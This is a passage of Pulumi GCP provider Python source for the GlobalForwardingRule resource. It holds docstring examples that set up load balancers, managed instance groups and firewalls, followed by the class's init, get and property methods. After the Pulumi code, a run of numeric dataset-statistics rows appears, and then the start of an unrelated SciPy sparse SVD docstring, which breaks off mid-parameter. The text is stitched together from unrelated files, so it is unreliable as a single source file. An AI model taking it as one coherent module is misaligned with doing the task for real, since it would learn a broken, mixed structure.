Represents a GlobalForwardingRule resource. Global forwarding rules are
used to forward traffic to the correct load balancer for HTTP load
balancing. Global forwarding rules can only be used for HTTP load
balancing.
For more information, see
https://cloud.google.com/compute/docs/load-balancing/http/
## Example Usage
### External Tcp Proxy Lb Mig Backend Custom Header
```python
import pulumi
import pulumi_gcp as gcp
# External TCP proxy load balancer with managed instance group backend
# VPC
default_network = gcp.compute.Network("defaultNetwork", auto_create_subnetworks=False,
opts=pulumi.ResourceOptions(provider=google_beta))
# backend subnet
default_subnetwork = gcp.compute.Subnetwork("defaultSubnetwork",
ip_cidr_range="10.0.1.0/24",
region="us-central1",
network=default_network.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# reserved IP address
default_global_address = gcp.compute.GlobalAddress("defaultGlobalAddress", opts=pulumi.ResourceOptions(provider=google_beta))
default_health_check = gcp.compute.HealthCheck("defaultHealthCheck",
timeout_sec=1,
check_interval_sec=1,
tcp_health_check=gcp.compute.HealthCheckTcpHealthCheckArgs(
port=80,
),
opts=pulumi.ResourceOptions(provider=google_beta))
# instance template
default_instance_template = gcp.compute.InstanceTemplate("defaultInstanceTemplate",
machine_type="e2-small",
tags=["allow-health-check"],
network_interfaces=[gcp.compute.InstanceTemplateNetworkInterfaceArgs(
network=default_network.id,
subnetwork=default_subnetwork.id,
access_configs=[gcp.compute.InstanceTemplateNetworkInterfaceAccessConfigArgs()],
)],
disks=[gcp.compute.InstanceTemplateDiskArgs(
source_image="debian-cloud/debian-10",
auto_delete=True,
boot=True,
)],
metadata={
"startup-script": \"\"\"#! /bin/bash
set -euo pipefail
export DEBIAN_FRONTEND=noninteractive
apt-get update
apt-get install -y nginx-light jq
NAME=$(curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/hostname")
IP=$(curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/0/ip")
METADATA=$(curl -f -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=True" | jq 'del(.["startup-script"])')
cat <<EOF > /var/www/html/index.html
<pre>
Name: $NAME
IP: $IP
Metadata: $METADATA
</pre>
EOF
\"\"\",
},
opts=pulumi.ResourceOptions(provider=google_beta))
# MIG
default_instance_group_manager = gcp.compute.InstanceGroupManager("defaultInstanceGroupManager",
zone="us-central1-c",
named_ports=[gcp.compute.InstanceGroupManagerNamedPortArgs(
name="tcp",
port=110,
)],
versions=[gcp.compute.InstanceGroupManagerVersionArgs(
instance_template=default_instance_template.id,
name="primary",
)],
base_instance_name="vm",
target_size=2,
opts=pulumi.ResourceOptions(provider=google_beta))
# backend service
default_backend_service = gcp.compute.BackendService("defaultBackendService",
protocol="TCP",
port_name="tcp",
load_balancing_scheme="EXTERNAL",
timeout_sec=10,
health_checks=[default_health_check.id],
backends=[gcp.compute.BackendServiceBackendArgs(
group=default_instance_group_manager.instance_group,
balancing_mode="UTILIZATION",
max_utilization=1,
capacity_scaler=1,
)],
opts=pulumi.ResourceOptions(provider=google_beta))
default_target_tcp_proxy = gcp.compute.TargetTCPProxy("defaultTargetTCPProxy", backend_service=default_backend_service.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# forwarding rule
default_global_forwarding_rule = gcp.compute.GlobalForwardingRule("defaultGlobalForwardingRule",
ip_protocol="TCP",
load_balancing_scheme="EXTERNAL",
port_range="110",
target=default_target_tcp_proxy.id,
ip_address=default_global_address.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# allow access from health check ranges
default_firewall = gcp.compute.Firewall("defaultFirewall",
direction="INGRESS",
network=default_network.id,
source_ranges=[
"130.211.0.0/22",
"35.191.0.0/16",
],
allows=[gcp.compute.FirewallAllowArgs(
protocol="tcp",
)],
target_tags=["allow-health-check"],
opts=pulumi.ResourceOptions(provider=google_beta))
```
### External Http Lb Mig Backend Custom Header
```python
import pulumi
import pulumi_gcp as gcp
# External HTTP load balancer with a CDN-enabled managed instance group backend
# and custom request and response headers
# VPC
default_network = gcp.compute.Network("defaultNetwork", auto_create_subnetworks=False,
opts=pulumi.ResourceOptions(provider=google_beta))
# backend subnet
default_subnetwork = gcp.compute.Subnetwork("defaultSubnetwork",
ip_cidr_range="10.0.1.0/24",
region="us-central1",
network=default_network.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# reserved IP address
default_global_address = gcp.compute.GlobalAddress("defaultGlobalAddress", opts=pulumi.ResourceOptions(provider=google_beta))
# health check
default_health_check = gcp.compute.HealthCheck("defaultHealthCheck", http_health_check=gcp.compute.HealthCheckHttpHealthCheckArgs(
port_specification="USE_SERVING_PORT",
),
opts=pulumi.ResourceOptions(provider=google_beta))
# instance template
default_instance_template = gcp.compute.InstanceTemplate("defaultInstanceTemplate",
machine_type="e2-small",
tags=["allow-health-check"],
network_interfaces=[gcp.compute.InstanceTemplateNetworkInterfaceArgs(
network=default_network.id,
subnetwork=default_subnetwork.id,
access_configs=[gcp.compute.InstanceTemplateNetworkInterfaceAccessConfigArgs()],
)],
disks=[gcp.compute.InstanceTemplateDiskArgs(
source_image="debian-cloud/debian-10",
auto_delete=True,
boot=True,
)],
metadata={
"startup-script": \"\"\"#! /bin/bash
set -euo pipefail
export DEBIAN_FRONTEND=noninteractive
apt-get update
apt-get install -y nginx-light jq
NAME=$(curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/hostname")
IP=$(curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/0/ip")
METADATA=$(curl -f -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=True" | jq 'del(.["startup-script"])')
cat <<EOF > /var/www/html/index.html
<pre>
Name: $NAME
IP: $IP
Metadata: $METADATA
</pre>
EOF
\"\"\",
},
opts=pulumi.ResourceOptions(provider=google_beta))
# MIG
default_instance_group_manager = gcp.compute.InstanceGroupManager("defaultInstanceGroupManager",
zone="us-central1-c",
named_ports=[gcp.compute.InstanceGroupManagerNamedPortArgs(
name="http",
port=8080,
)],
versions=[gcp.compute.InstanceGroupManagerVersionArgs(
instance_template=default_instance_template.id,
name="primary",
)],
base_instance_name="vm",
target_size=2,
opts=pulumi.ResourceOptions(provider=google_beta))
# backend service with custom request and response headers
default_backend_service = gcp.compute.BackendService("defaultBackendService",
protocol="HTTP",
port_name="my-port",
load_balancing_scheme="EXTERNAL",
timeout_sec=10,
enable_cdn=True,
custom_request_headers=["X-Client-Geo-Location: {client_region_subdivision}, {client_city}"],
custom_response_headers=["X-Cache-Hit: {cdn_cache_status}"],
health_checks=[default_health_check.id],
backends=[gcp.compute.BackendServiceBackendArgs(
group=default_instance_group_manager.instance_group,
balancing_mode="UTILIZATION",
capacity_scaler=1,
)],
opts=pulumi.ResourceOptions(provider=google_beta))
# url map
default_url_map = gcp.compute.URLMap("defaultURLMap", default_service=default_backend_service.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# http proxy
default_target_http_proxy = gcp.compute.TargetHttpProxy("defaultTargetHttpProxy", url_map=default_url_map.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# forwarding rule
default_global_forwarding_rule = gcp.compute.GlobalForwardingRule("defaultGlobalForwardingRule",
ip_protocol="TCP",
load_balancing_scheme="EXTERNAL",
port_range="80",
target=default_target_http_proxy.id,
ip_address=default_global_address.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# allow access from health check ranges
default_firewall = gcp.compute.Firewall("defaultFirewall",
direction="INGRESS",
network=default_network.id,
source_ranges=[
"130.211.0.0/22",
"35.191.0.0/16",
],
allows=[gcp.compute.FirewallAllowArgs(
protocol="tcp",
)],
target_tags=["allow-health-check"],
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Global Forwarding Rule Http
```python
import pulumi
import pulumi_gcp as gcp
default_http_health_check = gcp.compute.HttpHealthCheck("defaultHttpHealthCheck",
request_path="/",
check_interval_sec=1,
timeout_sec=1)
default_backend_service = gcp.compute.BackendService("defaultBackendService",
port_name="http",
protocol="HTTP",
timeout_sec=10,
health_checks=[default_http_health_check.id])
default_url_map = gcp.compute.URLMap("defaultURLMap",
description="a description",
default_service=default_backend_service.id,
host_rules=[gcp.compute.URLMapHostRuleArgs(
hosts=["mysite.com"],
path_matcher="allpaths",
)],
path_matchers=[gcp.compute.URLMapPathMatcherArgs(
name="allpaths",
default_service=default_backend_service.id,
path_rules=[gcp.compute.URLMapPathMatcherPathRuleArgs(
paths=["/*"],
service=default_backend_service.id,
)],
)])
default_target_http_proxy = gcp.compute.TargetHttpProxy("defaultTargetHttpProxy",
description="a description",
url_map=default_url_map.id)
default_global_forwarding_rule = gcp.compute.GlobalForwardingRule("defaultGlobalForwardingRule",
target=default_target_http_proxy.id,
port_range="80")
```
### Global Forwarding Rule Internal
```python
import pulumi
import pulumi_gcp as gcp
debian_image = gcp.compute.get_image(family="debian-9",
project="debian-cloud")
instance_template = gcp.compute.InstanceTemplate("instanceTemplate",
machine_type="e2-medium",
network_interfaces=[gcp.compute.InstanceTemplateNetworkInterfaceArgs(
network="default",
)],
disks=[gcp.compute.InstanceTemplateDiskArgs(
source_image=debian_image.self_link,
auto_delete=True,
boot=True,
)],
opts=pulumi.ResourceOptions(provider=google_beta))
igm = gcp.compute.InstanceGroupManager("igm",
versions=[gcp.compute.InstanceGroupManagerVersionArgs(
instance_template=instance_template.id,
name="primary",
)],
base_instance_name="internal-glb",
zone="us-central1-f",
target_size=1,
opts=pulumi.ResourceOptions(provider=google_beta))
default_health_check = gcp.compute.HealthCheck("defaultHealthCheck",
check_interval_sec=1,
timeout_sec=1,
tcp_health_check=gcp.compute.HealthCheckTcpHealthCheckArgs(
port=80,
),
opts=pulumi.ResourceOptions(provider=google_beta))
default_backend_service = gcp.compute.BackendService("defaultBackendService",
port_name="http",
protocol="HTTP",
timeout_sec=10,
load_balancing_scheme="INTERNAL_SELF_MANAGED",
backends=[gcp.compute.BackendServiceBackendArgs(
group=igm.instance_group,
balancing_mode="RATE",
capacity_scaler=0.4,
max_rate_per_instance=50,
)],
health_checks=[default_health_check.id],
opts=pulumi.ResourceOptions(provider=google_beta))
default_url_map = gcp.compute.URLMap("defaultURLMap",
description="a description",
default_service=default_backend_service.id,
host_rules=[gcp.compute.URLMapHostRuleArgs(
hosts=["mysite.com"],
path_matcher="allpaths",
)],
path_matchers=[gcp.compute.URLMapPathMatcherArgs(
name="allpaths",
default_service=default_backend_service.id,
path_rules=[gcp.compute.URLMapPathMatcherPathRuleArgs(
paths=["/*"],
service=default_backend_service.id,
)],
)],
opts=pulumi.ResourceOptions(provider=google_beta))
default_target_http_proxy = gcp.compute.TargetHttpProxy("defaultTargetHttpProxy",
description="a description",
url_map=default_url_map.id,
opts=pulumi.ResourceOptions(provider=google_beta))
default_global_forwarding_rule = gcp.compute.GlobalForwardingRule("defaultGlobalForwardingRule",
target=default_target_http_proxy.id,
port_range="80",
load_balancing_scheme="INTERNAL_SELF_MANAGED",
ip_address="0.0.0.0",
metadata_filters=[gcp.compute.GlobalForwardingRuleMetadataFilterArgs(
filter_match_criteria="MATCH_ANY",
filter_labels=[gcp.compute.GlobalForwardingRuleMetadataFilterFilterLabelArgs(
name="PLANET",
value="MARS",
)],
)],
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Private Service Connect Google Apis
```python
import pulumi
import pulumi_gcp as gcp
network = gcp.compute.Network("network",
project="my-project-name",
auto_create_subnetworks=False,
opts=pulumi.ResourceOptions(provider=google_beta))
vpc_subnetwork = gcp.compute.Subnetwork("vpcSubnetwork",
project=network.project,
ip_cidr_range="10.2.0.0/16",
region="us-central1",
network=network.id,
private_ip_google_access=True,
opts=pulumi.ResourceOptions(provider=google_beta))
default_global_address = gcp.compute.GlobalAddress("defaultGlobalAddress",
project=network.project,
address_type="INTERNAL",
purpose="PRIVATE_SERVICE_CONNECT",
network=network.id,
address="100.100.100.106",
opts=pulumi.ResourceOptions(provider=google_beta))
default_global_forwarding_rule = gcp.compute.GlobalForwardingRule("defaultGlobalForwardingRule",
project=network.project,
target="all-apis",
network=network.id,
ip_address=default_global_address.id,
load_balancing_scheme="",
opts=pulumi.ResourceOptions(provider=google_beta))
```
## Import
GlobalForwardingRule can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/globalForwardingRule:GlobalForwardingRule default projects/{{project}}/global/forwardingRules/{{name}}
```
```sh
$ pulumi import gcp:compute/globalForwardingRule:GlobalForwardingRule default {{project}}/{{name}}
```
```sh
$ pulumi import gcp:compute/globalForwardingRule:GlobalForwardingRule default {{name}}
```
:param str resource_name: The name of the resource.
:param GlobalForwardingRuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(GlobalForwardingRuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
ip_protocol: Optional[pulumi.Input[str]] = None,
ip_version: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
load_balancing_scheme: Optional[pulumi.Input[str]] = None,
metadata_filters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['GlobalForwardingRuleMetadataFilterArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
port_range: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = GlobalForwardingRuleArgs.__new__(GlobalForwardingRuleArgs)
__props__.__dict__["description"] = description
__props__.__dict__["ip_address"] = ip_address
__props__.__dict__["ip_protocol"] = ip_protocol
__props__.__dict__["ip_version"] = ip_version
__props__.__dict__["labels"] = labels
__props__.__dict__["load_balancing_scheme"] = load_balancing_scheme
__props__.__dict__["metadata_filters"] = metadata_filters
__props__.__dict__["name"] = name
__props__.__dict__["network"] = network
__props__.__dict__["port_range"] = port_range
__props__.__dict__["project"] = project
if target is None and not opts.urn:
raise TypeError("Missing required property 'target'")
__props__.__dict__["target"] = target
__props__.__dict__["label_fingerprint"] = None
__props__.__dict__["self_link"] = None
super(GlobalForwardingRule, __self__).__init__(
'gcp:compute/globalForwardingRule:GlobalForwardingRule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
ip_protocol: Optional[pulumi.Input[str]] = None,
ip_version: Optional[pulumi.Input[str]] = None,
label_fingerprint: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
load_balancing_scheme: Optional[pulumi.Input[str]] = None,
metadata_filters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['GlobalForwardingRuleMetadataFilterArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
port_range: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
self_link: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None) -> 'GlobalForwardingRule':
"""
Get an existing GlobalForwardingRule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: An optional description of this resource. Provide this property when
you create the resource.
:param pulumi.Input[str] ip_address: The IP address that this forwarding rule serves. When a client sends
traffic to this IP address, the forwarding rule directs the traffic to
the target that you specify in the forwarding rule. The
loadBalancingScheme and the forwarding rule's target determine the
type of IP address that you can use. For detailed information, refer
to [IP address specifications](https://cloud.google.com/load-balancing/docs/forwarding-rule-concepts#ip_address_specifications).
An address can be specified either by a literal IP address or a
reference to an existing Address resource. If you don't specify a
reserved IP address, an ephemeral IP address is assigned.
The value must be set to 0.0.0.0 when the target is a targetGrpcProxy
that has validateForProxyless field set to true.
For Private Service Connect forwarding rules that forward traffic to
Google APIs, IP address must be provided.
:param pulumi.Input[str] ip_protocol: The IP protocol to which this rule applies. When the load balancing scheme is
INTERNAL_SELF_MANAGED, only TCP is valid. This field must not be set if the
global address is configured as a purpose of PRIVATE_SERVICE_CONNECT
and addressType of INTERNAL
Possible values are `TCP`, `UDP`, `ESP`, `AH`, `SCTP`, and `ICMP`.
:param pulumi.Input[str] ip_version: The IP Version that will be used by this global forwarding rule.
Possible values are `IPV4` and `IPV6`.
:param pulumi.Input[str] label_fingerprint: Used internally during label updates.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to this forwarding rule. A list of key->value pairs.
:param pulumi.Input[str] load_balancing_scheme: This signifies what the GlobalForwardingRule will be used for.
The value of INTERNAL_SELF_MANAGED means that this will be used for
Internal Global HTTP(S) LB. The value of EXTERNAL means that this
will be used for External Global Load Balancing (HTTP(S) LB,
External TCP/UDP LB, SSL Proxy)
Note: This field must be set "" if the global address is
configured as a purpose of PRIVATE_SERVICE_CONNECT and addressType of INTERNAL.
Default value is `EXTERNAL`.
Possible values are `EXTERNAL` and `INTERNAL_SELF_MANAGED`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['GlobalForwardingRuleMetadataFilterArgs']]]] metadata_filters: Opaque filter criteria used by Loadbalancer to restrict routing
configuration to a limited set xDS compliant clients. In their xDS
requests to Loadbalancer, xDS clients present node metadata. If a
match takes place, the relevant routing configuration is made available
to those proxies.
For each metadataFilter in this list, if its filterMatchCriteria is set
to MATCH_ANY, at least one of the filterLabels must match the
corresponding label provided in the metadata. If its filterMatchCriteria
is set to MATCH_ALL, then all of its filterLabels must match with
corresponding labels in the provided metadata.
metadataFilters specified here can be overridden by those specified in
the UrlMap that this ForwardingRule references.
metadataFilters only applies to Loadbalancers that have their
loadBalancingScheme set to INTERNAL_SELF_MANAGED.
Structure is documented below.
:param pulumi.Input[str] name: Name of the metadata label. The length must be between
1 and 1024 characters, inclusive.
:param pulumi.Input[str] network: This field is not used for external load balancing.
For INTERNAL_SELF_MANAGED load balancing, this field
identifies the network that the load balanced IP should belong to
for this global forwarding rule. If this field is not specified,
the default network will be used.
:param pulumi.Input[str] port_range: This field is used along with the target field for TargetHttpProxy,
TargetHttpsProxy, TargetSslProxy, TargetTcpProxy, TargetVpnGateway,
TargetPool, TargetInstance.
Applicable only when IPProtocol is TCP, UDP, or SCTP, only packets
addressed to ports in the specified range will be forwarded to target.
Forwarding rules with the same [IPAddress, IPProtocol] pair must have
disjoint port ranges.
Some types of forwarding target have constraints on the acceptable
ports:
* TargetHttpProxy: 80, 8080
* TargetHttpsProxy: 443
* TargetTcpProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetSslProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetVpnGateway: 500, 4500
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] self_link: The URI of the created resource.
:param pulumi.Input[str] target: The URL of the target resource to receive the matched traffic.
The forwarded traffic must be of a type appropriate to the target object.
For INTERNAL_SELF_MANAGED load balancing, only HTTP and HTTPS targets
are valid.
For global address with a purpose of PRIVATE_SERVICE_CONNECT and
addressType of INTERNAL, only "all-apis" and "vpc-sc" are valid.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _GlobalForwardingRuleState.__new__(_GlobalForwardingRuleState)
__props__.__dict__["description"] = description
__props__.__dict__["ip_address"] = ip_address
__props__.__dict__["ip_protocol"] = ip_protocol
__props__.__dict__["ip_version"] = ip_version
__props__.__dict__["label_fingerprint"] = label_fingerprint
__props__.__dict__["labels"] = labels
__props__.__dict__["load_balancing_scheme"] = load_balancing_scheme
__props__.__dict__["metadata_filters"] = metadata_filters
__props__.__dict__["name"] = name
__props__.__dict__["network"] = network
__props__.__dict__["port_range"] = port_range
__props__.__dict__["project"] = project
__props__.__dict__["self_link"] = self_link
__props__.__dict__["target"] = target
return GlobalForwardingRule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
An optional description of this resource. Provide this property when
you create the resource.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> pulumi.Output[str]:
"""
The IP address that this forwarding rule serves. When a client sends
traffic to this IP address, the forwarding rule directs the traffic to
the target that you specify in the forwarding rule. The
loadBalancingScheme and the forwarding rule's target determine the
type of IP address that you can use. For detailed information, refer
to [IP address specifications](https://cloud.google.com/load-balancing/docs/forwarding-rule-concepts#ip_address_specifications).
An address can be specified either by a literal IP address or a
reference to an existing Address resource. If you don't specify a
reserved IP address, an ephemeral IP address is assigned.
The value must be set to 0.0.0.0 when the target is a targetGrpcProxy
that has validateForProxyless field set to true.
For Private Service Connect forwarding rules that forward traffic to
Google APIs, IP address must be provided.
"""
return pulumi.get(self, "ip_address")
@property
@pulumi.getter(name="ipProtocol")
def ip_protocol(self) -> pulumi.Output[str]:
"""
The IP protocol to which this rule applies. When the load balancing scheme is
INTERNAL_SELF_MANAGED, only TCP is valid. This field must not be set if the
global address is configured as a purpose of PRIVATE_SERVICE_CONNECT
and addressType of INTERNAL
Possible values are `TCP`, `UDP`, `ESP`, `AH`, `SCTP`, and `ICMP`.
"""
return pulumi.get(self, "ip_protocol")
@property
@pulumi.getter(name="ipVersion")
def ip_version(self) -> pulumi.Output[Optional[str]]:
"""
The IP Version that will be used by this global forwarding rule.
Possible values are `IPV4` and `IPV6`.
"""
return pulumi.get(self, "ip_version")
@property
@pulumi.getter(name="labelFingerprint")
def label_fingerprint(self) -> pulumi.Output[str]:
"""
Used internally during label updates.
"""
return pulumi.get(self, "label_fingerprint")
@property
@pulumi.getter
def labels(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Labels to apply to this forwarding rule. A list of key->value pairs.
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter(name="loadBalancingScheme")
def load_balancing_scheme(self) -> pulumi.Output[Optional[str]]:
"""
This signifies what the GlobalForwardingRule will be used for.
The value of INTERNAL_SELF_MANAGED means that this will be used for
Internal Global HTTP(S) LB. The value of EXTERNAL means that this
will be used for External Global Load Balancing (HTTP(S) LB,
External TCP/UDP LB, SSL Proxy)
Note: This field must be set "" if the global address is
configured as a purpose of PRIVATE_SERVICE_CONNECT and addressType of INTERNAL.
Default value is `EXTERNAL`.
Possible values are `EXTERNAL` and `INTERNAL_SELF_MANAGED`.
"""
return pulumi.get(self, "load_balancing_scheme")
@property
@pulumi.getter(name="metadataFilters")
def metadata_filters(self) -> pulumi.Output[Optional[Sequence['outputs.GlobalForwardingRuleMetadataFilter']]]:
"""
Opaque filter criteria used by Loadbalancer to restrict routing
configuration to a limited set xDS compliant clients. In their xDS
requests to Loadbalancer, xDS clients present node metadata. If a
match takes place, the relevant routing configuration is made available
to those proxies.
For each metadataFilter in this list, if its filterMatchCriteria is set
to MATCH_ANY, at least one of the filterLabels must match the
corresponding label provided in the metadata. If its filterMatchCriteria
is set to MATCH_ALL, then all of its filterLabels must match with
corresponding labels in the provided metadata.
metadataFilters specified here can be overridden by those specified in
the UrlMap that this ForwardingRule references.
metadataFilters only applies to Loadbalancers that have their
loadBalancingScheme set to INTERNAL_SELF_MANAGED.
Structure is documented below.
"""
return pulumi.get(self, "metadata_filters")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the metadata label. The length must be between
1 and 1024 characters, inclusive.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def network(self) -> pulumi.Output[str]:
"""
This field is not used for external load balancing.
For INTERNAL_SELF_MANAGED load balancing, this field
identifies the network that the load balanced IP should belong to
for this global forwarding rule. If this field is not specified,
the default network will be used.
"""
return pulumi.get(self, "network")
@property
@pulumi.getter(name="portRange")
def port_range(self) -> pulumi.Output[Optional[str]]:
"""
This field is used along with the target field for TargetHttpProxy,
TargetHttpsProxy, TargetSslProxy, TargetTcpProxy, TargetVpnGateway,
TargetPool, TargetInstance.
Applicable only when IPProtocol is TCP, UDP, or SCTP, only packets
addressed to ports in the specified range will be forwarded to target.
Forwarding rules with the same [IPAddress, IPProtocol] pair must have
disjoint port ranges.
Some types of forwarding target have constraints on the acceptable
ports:
* TargetHttpProxy: 80, 8080
* TargetHttpsProxy: 443
* TargetTcpProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetSslProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetVpnGateway: 500, 4500
"""
return pulumi.get(self, "port_range")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> pulumi.Output[str]:
"""
The URI of the created resource.
"""
return pulumi.get(self, "self_link")
@property
@pulumi.getter
def target(self) -> pulumi.Output[str]:
"""
The URL of the target resource to receive the matched traffic.
The forwarded traffic must be of a type appropriate to the target object.
For INTERNAL_SELF_MANAGED load balancing, only HTTP and HTTPS targets
are valid.
For global address with a purpose of PRIVATE_SERVICE_CONNECT and
addressType of INTERNAL, only "all-apis" and "vpc-sc" are valid.
"""
return pulumi.get(self, "target")
| 49.540161
| 193
| 0.643154
| 11,045
| 98,684
| 5.605432
| 0.047623
| 0.035179
| 0.035502
| 0.033758
| 0.964094
| 0.958183
| 0.952368
| 0.949929
| 0.948314
| 0.938913
| 0
| 0.014253
| 0.276225
| 98,684
| 1,991
| 194
| 49.565043
| 0.852559
| 0.66716
| 0
| 0.81448
| 1
| 0
| 0.101532
| 0.030273
| 0
| 0
| 0
| 0
| 0
| 1
| 0.165158
| false
| 0.002262
| 0.015837
| 0
| 0.280543
| 0.033937
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b641d567e2496bd4306beeb12c476846dd5c8c9e
| 15,522
|
py
|
Python
|
scipy/sparse/linalg/eigen/_svds_doc.py
|
dhruv9vats/scipy
|
48e1dd7e604df3ae57d104b407c5b7a2a6a3247d
|
[
"BSD-3-Clause"
] | null | null | null |
scipy/sparse/linalg/eigen/_svds_doc.py
|
dhruv9vats/scipy
|
48e1dd7e604df3ae57d104b407c5b7a2a6a3247d
|
[
"BSD-3-Clause"
] | null | null | null |
scipy/sparse/linalg/eigen/_svds_doc.py
|
dhruv9vats/scipy
|
48e1dd7e604df3ae57d104b407c5b7a2a6a3247d
|
[
"BSD-3-Clause"
] | null | null | null |
def _svds_arpack_doc(A, k=6, ncv=None, tol=0, which='LM', v0=None,
maxiter=None, return_singular_vectors=True,
solver='arpack', random_state=None):
"""
Partial singular value decomposition of a sparse matrix using ARPACK.
Compute the largest or smallest `k` singular values and corresponding
singular vectors of a sparse matrix `A`. The order in which the singular
values are returned is not guaranteed.
In the descriptions below, let ``M, N = A.shape``.
Parameters
----------
A : sparse matrix or LinearOperator
Matrix to decompose.
k : int, optional
Number of singular values and singular vectors to compute.
Must satisfy ``1 <= k <= min(M, N) - 1``.
Default is 6.
ncv : int, optional
The number of Lanczos vectors generated.
The default is ``min(n, max(2*k + 1, 20))``.
If specified, must satistify ``k + 1 < ncv < min(M, N)``; ``ncv > 2*k``
is recommended.
tol : float, optional
Tolerance for singular values. Zero (default) means machine precision.
which : {'LM', 'SM'}
Which `k` singular values to find: either the largest magnitude ('LM')
or smallest magnitude ('SM') singular values.
v0 : ndarray, optional
The starting vector for iteration:
an (approximate) left singular vector if ``N > M`` and a right singular
vector otherwise. Must be of length ``min(M, N)``.
Default: random
maxiter : int, optional
Maximum number of Arnoldi update iterations allowed;
default is ``min(M, N) * 10``.
return_singular_vectors : {True, False, "u", "vh"}
Singular values are always computed and returned; this parameter
controls the computation and return of singular vectors.
- ``True``: return singular vectors.
- ``False``: do not return singular vectors.
- ``"u"``: if ``M <= N``, compute only the left singular vectors and
return ``None`` for the right singular vectors. Otherwise, compute
all singular vectors.
- ``"vh"``: if ``M > N``, compute only the right singular vectors and
return ``None`` for the left singular vectors. Otherwise, compute
all singular vectors.
solver : {'arpack', 'propack', 'lobpcg'}, optional
This is the solver-specific documentation for ``solver='arpack'``.
:ref:`'lobpcg' <sparse.linalg.svds-lobpcg>` and
:ref:`'propack' <sparse.linalg.svds-propack>`
are also supported.
random_state : {None, int, `numpy.random.Generator`,
`numpy.random.RandomState`}, optional
Pseudorandom number generator state used to generate resamples.
If `random_state` is ``None`` (or `np.random`), the
`numpy.random.RandomState` singleton is used.
If `random_state` is an int, a new ``RandomState`` instance is used,
seeded with `random_state`.
